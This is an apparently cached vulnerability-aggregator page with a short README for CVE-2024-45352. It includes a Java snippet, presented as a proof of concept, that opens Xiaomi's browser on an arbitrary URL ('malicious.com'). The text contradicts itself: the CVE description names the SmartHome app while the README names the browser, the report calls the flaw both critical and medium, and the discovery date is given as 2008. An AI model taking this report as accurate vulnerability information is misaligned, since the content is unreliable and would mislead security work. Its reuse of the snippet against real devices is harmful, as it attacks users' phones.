Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-45352 PoC — Xiaomi SmartHome APP 安全漏洞

Source
Associated Vulnerability
Title:Xiaomi SmartHome APP 安全漏洞 (CVE-2024-45352)
Description:Xiaomi SmartHome APP是中国小米(Xiaomi)公司的一款管理小米智能家居产品的应用。 Xiaomi SmartHome APP存在安全漏洞,该漏洞源于输入验证不当,可能导致代码执行。
Description
Reporte técnico sobre vulnerabilidad crítica de Xiaomi 
Readme
# xiaomi-cve-2024-45352
Reporte técnico sobre vulnerabilidad crítica de Xiaomi 
Vulnerability Summary
A vulnerability was discovered in Xiaomi's default browser (com.android.browser) on various MIUI devices. The app fails to properly validate intents passed via `startActivity`, allowing malicious apps to open arbitrary URLs or perform unintended actions.

- **CVE ID**: CVE-2024-45352
- **Component**
- :com.android.browser
- **Severity**: Medium
- **Status**: Reported to Xiaomi (awaiting confirmation)
- **Date Found**: [24 de abril del 2008]

## 🔥 Proof of Concept (PoC)

1. Create a simple malicious app with the following intent:
```java
Intent intent = new Intent();
intent.setComponent(new ComponentName("com.android.browser", "com.android.browser.BrowserActivity"));
intent.setData(Uri.parse("http://malicious.com"));
startActivity(intent);
File Snapshot

[4.0K] /data/pocs/5dd02639c8c8b3cb766ea0adc289f411c3f6d5a2 ├── [ 30] CVE-2024-45352-Reporte-Tecnico.pdf ├── [1.0K] LICENSE └── [ 856] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.